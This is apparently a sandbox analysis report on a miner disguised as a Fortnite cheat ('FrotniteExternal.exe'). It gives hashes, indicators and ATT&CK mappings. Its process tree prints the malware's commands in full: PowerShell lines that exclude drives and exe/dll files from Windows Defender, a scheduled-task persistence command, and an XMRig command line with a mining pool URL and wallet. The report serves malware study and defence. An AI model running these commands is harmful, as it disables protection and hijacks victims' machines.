xmrig | d3a28b447201702f21bbf9f2bd7acf95962e613632f7b19be41f3636c74a1b72

Analysis

max time kernel
150s
max time network
152s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
20-12-2024 01:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FrotniteExternal.exe
Size

37KB
MD5

923d13d8499dd65d87611264a8e43002
SHA1

fcd2ede4ea47146687a642c8f60385e33edc5bb5
SHA256

d3a28b447201702f21bbf9f2bd7acf95962e613632f7b19be41f3636c74a1b72
SHA512

0b103b74f6368e7a46cf9371e534fd28339f1c04712e91de3f7f38ac81e4b9c0a3a5c79fe7e8411ce883038951c07cdee7b8944380e65e56d171e2103c2f4582
SSDEEP

768:whrLAIpwTDqbVLiqy64839q9Mq/oiE9aycHGj:oeqB2qy6x81O

Score

10^/10

xmrig execution miner

Malware Config

Signatures

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 24 IoCs

miner

resource	yara_rule
behavioral1/memory/1768-72-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-74-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-76-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-78-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-80-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-82-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-84-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-87-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-89-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-91-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-93-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-96-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-97-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-99-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-98-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-95-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-101-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-102-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-103-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-104-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-105-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-110-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-111-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1768-112-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2504	powershell.exe
1800	powershell.exe
2956	powershell.exe
2332	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
2648	cm2.exe
1956	services64.exe
2496	sihost64.exe

Loads dropped DLL 3 IoCs

pid	Process
2448	FrotniteExternal.exe
940	cmd.exe
2192	conhost.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2192 set thread context of 1768	2192	conhost.exe	51

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	FrotniteExternal.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	FrotniteExternal.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1052	schtasks.exe

Suspicious behavior: EnumeratesProcesses 37 IoCs

pid	Process
2664	conhost.exe
1800	powershell.exe
2956	powershell.exe
2192	conhost.exe
2192	conhost.exe
2332	powershell.exe
2504	powershell.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe
1768	notepad.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
464	Process not Found

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	2664	conhost.exe
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	2956	powershell.exe
Token: SeDebugPrivilege	2192	conhost.exe
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeDebugPrivilege	2504	powershell.exe
Token: SeLockMemoryPrivilege	1768	notepad.exe
Token: SeLockMemoryPrivilege	1768	notepad.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2448 wrote to memory of 2648	2448	FrotniteExternal.exe	31
PID 2448 wrote to memory of 2648	2448	FrotniteExternal.exe	31
PID 2448 wrote to memory of 2648	2448	FrotniteExternal.exe	31
PID 2648 wrote to memory of 2664	2648	cm2.exe	33
PID 2648 wrote to memory of 2664	2648	cm2.exe	33
PID 2648 wrote to memory of 2664	2648	cm2.exe	33
PID 2648 wrote to memory of 2664	2648	cm2.exe	33
PID 2664 wrote to memory of 604	2664	conhost.exe	34
PID 2664 wrote to memory of 604	2664	conhost.exe	34
PID 2664 wrote to memory of 604	2664	conhost.exe	34
PID 604 wrote to memory of 1800	604	cmd.exe	36
PID 604 wrote to memory of 1800	604	cmd.exe	36
PID 604 wrote to memory of 1800	604	cmd.exe	36
PID 2664 wrote to memory of 2424	2664	conhost.exe	38
PID 2664 wrote to memory of 2424	2664	conhost.exe	38
PID 2664 wrote to memory of 2424	2664	conhost.exe	38
PID 2424 wrote to memory of 1052	2424	cmd.exe	40
PID 2424 wrote to memory of 1052	2424	cmd.exe	40
PID 2424 wrote to memory of 1052	2424	cmd.exe	40
PID 604 wrote to memory of 2956	604	cmd.exe	41
PID 604 wrote to memory of 2956	604	cmd.exe	41
PID 604 wrote to memory of 2956	604	cmd.exe	41
PID 2664 wrote to memory of 940	2664	conhost.exe	42
PID 2664 wrote to memory of 940	2664	conhost.exe	42
PID 2664 wrote to memory of 940	2664	conhost.exe	42
PID 940 wrote to memory of 1956	940	cmd.exe	44
PID 940 wrote to memory of 1956	940	cmd.exe	44
PID 940 wrote to memory of 1956	940	cmd.exe	44
PID 1956 wrote to memory of 2192	1956	services64.exe	45
PID 1956 wrote to memory of 2192	1956	services64.exe	45
PID 1956 wrote to memory of 2192	1956	services64.exe	45
PID 1956 wrote to memory of 2192	1956	services64.exe	45
PID 2192 wrote to memory of 1840	2192	conhost.exe	46
PID 2192 wrote to memory of 1840	2192	conhost.exe	46
PID 2192 wrote to memory of 1840	2192	conhost.exe	46
PID 1840 wrote to memory of 2332	1840	cmd.exe	48
PID 1840 wrote to memory of 2332	1840	cmd.exe	48
PID 1840 wrote to memory of 2332	1840	cmd.exe	48
PID 2192 wrote to memory of 2496	2192	conhost.exe	49
PID 2192 wrote to memory of 2496	2192	conhost.exe	49
PID 2192 wrote to memory of 2496	2192	conhost.exe	49
PID 1840 wrote to memory of 2504	1840	cmd.exe	50
PID 1840 wrote to memory of 2504	1840	cmd.exe	50
PID 1840 wrote to memory of 2504	1840	cmd.exe	50
PID 2192 wrote to memory of 1768	2192	conhost.exe	51
PID 2192 wrote to memory of 1768	2192	conhost.exe	51
PID 2192 wrote to memory of 1768	2192	conhost.exe	51
PID 2192 wrote to memory of 1768	2192	conhost.exe	51
PID 2192 wrote to memory of 1768	2192	conhost.exe	51
PID 2192 wrote to memory of 1768	2192	conhost.exe	51
PID 2192 wrote to memory of 1768	2192	conhost.exe	51
PID 2192 wrote to memory of 1768	2192	conhost.exe	51
PID 2192 wrote to memory of 1768	2192	conhost.exe	51
PID 2192 wrote to memory of 1768	2192	conhost.exe	51
PID 2192 wrote to memory of 1768	2192	conhost.exe	51
PID 2192 wrote to memory of 1768	2192	conhost.exe	51
PID 2192 wrote to memory of 1768	2192	conhost.exe	51
PID 2192 wrote to memory of 1768	2192	conhost.exe	51
PID 2192 wrote to memory of 1768	2192	conhost.exe	51
PID 2192 wrote to memory of 1768	2192	conhost.exe	51
PID 2496 wrote to memory of 1224	2496	sihost64.exe	52
PID 2496 wrote to memory of 1224	2496	sihost64.exe	52
PID 2496 wrote to memory of 1224	2496	sihost64.exe	52
PID 2496 wrote to memory of 1224	2496	sihost64.exe	52

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\FrotniteExternal.exe
"C:\Users\Admin\AppData\Local\Temp\FrotniteExternal.exe"
1⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2448
- C:\Users\Admin\AppData\Local\Temp\cm2.exe
  "C:\Users\Admin\AppData\Local\Temp\cm2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2648
- - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\cm2.exe"
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2664
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:604
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1800
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2956
  - - C:\Windows\System32\cmd.exe
      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2424
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1052
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c "C:\Windows\system32\services64.exe"
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:940
    - - C:\Windows\system32\services64.exe
        
        C:\Windows\system32\services64.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1956
      - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
        6⤵
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2192
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2504
        
        C:\Windows\system32\Microsoft\Libs\sihost64.exe
        
        "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2496
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        8⤵
        
        PID:1224
        
        C:\Windows\System32\notepad.exe
        
        C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10343 --user=88SnrVgESxo4oqDueYzTEcYaJJR5sQpBAJwk5bMuskEg9jWfT5X5eYvhdPu8vWPBV1Tqbx31GitQURNLmvKkBtH5QsY6dN3 --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1768

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
0b182df2e974d00e1e7fab4cfaff373f

SHA1
1e02b162e1566030debebad80f709ccb9127ee17

SHA256
a3e3ad31e0ef90f381dff96326ea15bad88c23b2a4a2b72c22a81435f403731a

SHA512
15390424c3ce9bd3ebb7116a3949d125d7edc0192415643c7af4dd74b87c2c4454a50ae60a8983408050cad06fed8daed72a52ab3895aec47eb9262a34be2a9f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
fd7b11d9518e1000e2801a7d03f7596d

SHA1
2e3daa697810c46919b38370a9d1a9a0f44e1448

SHA256
df3447ee096fa4959e938c0a964b909726cc2ffed9b41a1b32fbc59dbaf16961

SHA512
5f71d6a230a9c4bb1d50f3e5f20f7aed5b058fe674a3f5a452f26ea2671a1be21e157010e9084bcbed149c2344662f0bebe216c2f0796384929615612fc9b514

Download Submit
\Users\Admin\AppData\Local\Temp\cm2.exe

Filesize
2.1MB

MD5
a954a23215467586a71022e732b23a8d

SHA1
c089a6662e8f7bac5ec791b80ec81b77e20bdff4

SHA256
007e711c06244bbbbf534b878d665ee0f17abbac80c7d4fb794f357684151751

SHA512
e44f9f8aebebbb7a5559b67fe6824cc5637a8961aae2e929bdabfc0720b2b10ae70d7bcb9c132f1a3d6532848184bb3b9ec4f59a11d523dd215173df676860b9

Download Submit
\Windows\System32\Microsoft\Libs\sihost64.exe

Filesize
32KB

MD5
76dd3f5cec238575932dfbe21ff77b71

SHA1
100b90b4c2880405683177513f5ef170257af160

SHA256
1e5758dc2cf566629840cf437aadc72f4d5850bea3017f0751c30294989ea348

SHA512
0c7d15ff6afe065fec4a20072f909663e2e048582ddfe34d15901cd7e16c4a8ac7911791191d01d5be496b6d1fb4b9492ecc8e271c28ffc263a2cdb4faa7e5d6

Download Submit
memory/1224-108-0x0000000000200000-0x0000000000206000-memory.dmp

Filesize
24KB

Download
memory/1224-107-0x0000000000060000-0x0000000000066000-memory.dmp

Filesize
24KB

Download
memory/1768-99-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-98-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-112-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-111-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-110-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-105-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-104-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-103-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-102-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-101-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-95-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-97-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-68-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-66-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-90-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

Filesize
4KB

Download
memory/1768-70-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-72-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-74-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-76-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-78-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-80-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-82-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-84-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-87-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-89-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-91-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-94-0x0000000000170000-0x0000000000190000-memory.dmp

Filesize
128KB

Download
memory/1768-93-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1768-96-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1800-32-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

Filesize
32KB

Download
memory/1800-31-0x000000001B530000-0x000000001B812000-memory.dmp

Filesize
2.9MB

Download
memory/2664-40-0x000007FEF5F63000-0x000007FEF5F64000-memory.dmp

Filesize
4KB

Download
memory/2664-24-0x000007FEF5F60000-0x000007FEF694C000-memory.dmp

Filesize
9.9MB

Download
memory/2664-48-0x000007FEF5F60000-0x000007FEF694C000-memory.dmp

Filesize
9.9MB

Download
memory/2664-41-0x000007FEF5F60000-0x000007FEF694C000-memory.dmp

Filesize
9.9MB

Download
memory/2664-23-0x000007FEF5F60000-0x000007FEF694C000-memory.dmp

Filesize
9.9MB

Download
memory/2664-21-0x000007FEF5F63000-0x000007FEF5F64000-memory.dmp

Filesize
4KB

Download
memory/2664-20-0x00000000000A0000-0x00000000002C1000-memory.dmp

Filesize
2.1MB

Download
memory/2664-25-0x000007FEF5F60000-0x000007FEF694C000-memory.dmp

Filesize
9.9MB

Download
memory/2664-26-0x000007FEF5F60000-0x000007FEF694C000-memory.dmp

Filesize
9.9MB

Download
memory/2664-22-0x000000001B3A0000-0x000000001B5C0000-memory.dmp

Filesize
2.1MB

Download
memory/2956-39-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

Filesize
32KB

Download
memory/2956-38-0x000000001B2D0000-0x000000001B5B2000-memory.dmp

Filesize
2.9MB

Download